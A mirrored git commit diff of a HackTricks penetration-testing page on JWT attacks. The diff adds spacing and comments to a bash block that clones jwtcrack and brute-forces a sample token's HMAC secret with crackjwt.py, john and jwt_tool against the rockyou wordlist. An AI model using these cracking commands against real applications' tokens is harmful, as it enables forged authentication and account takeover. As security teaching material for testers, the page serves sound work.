mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page modified
This commit is contained in:
parent
95777a36c9
commit
a1fab3d9e2
|
@ -47,13 +47,15 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a
|
|||
```bash
|
||||
git clone https://github.com/Sjord/jwtcrack.git
|
||||
cd jwtcrack
|
||||
|
||||
#Bruteforce using crackjwt.py
|
||||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||||
|
||||
#Bruteforce using john
|
||||
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
|
||||
john jwt.john #It does not work with Kali-John
|
||||
|
||||
#https://github.com/ticarpi/jwt_tool
|
||||
python3 jwt_tool.py -d wordlists.txt <JWT token>
|
||||
```
|
||||
|
||||
## Modify the algorithm to None \(CVE-2015-9235\)
|
||||
|
|
Loading…
Reference in a new issue